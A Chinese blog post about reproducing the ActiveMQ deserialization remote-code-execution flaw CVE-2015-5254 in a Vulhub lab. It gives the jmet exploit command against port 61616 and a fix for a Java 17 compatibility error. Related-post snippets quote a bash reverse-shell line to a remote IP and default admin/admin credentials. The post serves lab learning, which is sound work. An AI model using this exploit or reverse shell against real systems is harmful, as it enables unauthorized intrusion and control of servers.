Vulhub漏洞之ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)【漏洞复现利用以及常见问题解决方案】

已于 2023-02-18 16:41:08 修改
阅读量444 收藏
点赞数
分类专栏: # 反序列化漏洞 # Vulhub 文章标签: java-activemq java 网络安全 web安全
于 2023-02-15 19:28:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43095240/article/details/129048616
版权

复现环境

kali2022、java1.8

所需工具

【jmet】下载地址

漏洞复现以及利用

具体过程参考此文章,但要注意命令中event的大小写问题,很多文章(包括vulhub官网)都存在这个书写的细节错误。

问题描述

运行如下命令:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

报错信息:
Exception in thread “main” java.lang.IllegalAccessError:…
…because module java.xml dose not export…
在这里插入图片描述

可能原因

java版本太高不兼容,上述问题出现时所用java版本为java17。

解决方案

再安装一个较低版本的java,我安装的是java1.8,安装方法参考此文章
修改系统使用的java版本参考此文章,只看最后一部分变更JDK版本,选择jdk1.8即可。

hlsilent
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
activemq 远程代码执行CVE-2016-3088)
qq_32445755的博客
03-31 527
简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Javaweb 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
ActiveMQ 反序列化漏洞CVE-2015-5254利用工具
08-15
ActiveMQ 反序列化漏洞CVE-2015-5254利用工具,ActiveMQ漏洞反序列化漏洞CVE-2015-5254利用工具,工具
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
FryhRx的博客
03-29 4482
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 630
vulhub漏洞复现-jboss反序列化漏洞
Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
errorr0
07-11 1088
CVE-2017-5645复现
vulhub漏洞复现- ActiveMQ 反序列化漏洞CVE-2015-5254
m0_62805300的博客
06-18 131
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用漏洞执行任意代码。使用jmet构造反序列化对象payload 进入管理者页面(弱口令admin/admin)
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
activemq-cpp-library-3.9.5编译的C++库文件,支持vs2015,vs2017,包括了依赖的库文件和头文件,可以在项目中直接使用。
boot-example-activemq-topic-2.0.5
01-27
SpringBoot+ActiveMQ-发布订阅 Topic 主题 * 消息消费者(订阅方式)消费该消息 * 消费生产者将发布到topic中,同时有多个消息消费者(订阅)消费该消息 * 这种方式和点对点方式不同,发布到topic的消息会被所有...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
Apache Shiro-550反序列化漏洞复现vulhub
weixin_52685785的博客
03-27 179
使用vulhub进行复现,内有shiro_attack工具链接,在 Shiro
vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3583
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
ActiveMQ反序列化漏洞CVE-2015-5254复现
菲曼巴的博客
11-24 3465
ActiveMQ反序列化漏洞CVE-2015-5254复现详细过程 访问ip:8161/admin 默认密码:admin/admin wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar kali下载工具并使用 mkdir external 创建文件夹否则会报错提示不存在文件夹 bash -i >& /dev/tcp/192.168.186.129/8888 0>
ActiveMQ 反序列化漏洞复现CVE-2015-5254
浮生一世暖流年的博客
12-18 254
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。 复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
ActiveMQ 反序列化漏洞CVE-2015-5254
jie_a的博客
07-27 188
运行漏洞环境: docker-compose up -d 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。 下载利用工具 git clone https://github.com.cnpmjs.org/ianxtianxt/jmet.git 进入 jmet 文件 执行语句 java -jar jmet-0.1.0-all.jar
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
swordheart的博客
01-18 708
漏洞简介 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.x版本之前的5.13.0安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用漏洞执行任意代码。 漏洞环境 Docker -compose up -d 运行环
activemq哪些版本解决了CVE-2022-2048漏洞
最新发布
06-10
CVE-2022-2048是ActiveMQ的一个安全漏洞,这个漏洞可以允许攻击者通过发送特制的消息来执行任意代码。Apache ActiveMQ从5.15.16开始修复了这个漏洞。因此,如果你使用的是Apache ActiveMQ 5.15.16或更高版本,则已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hlsilent

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值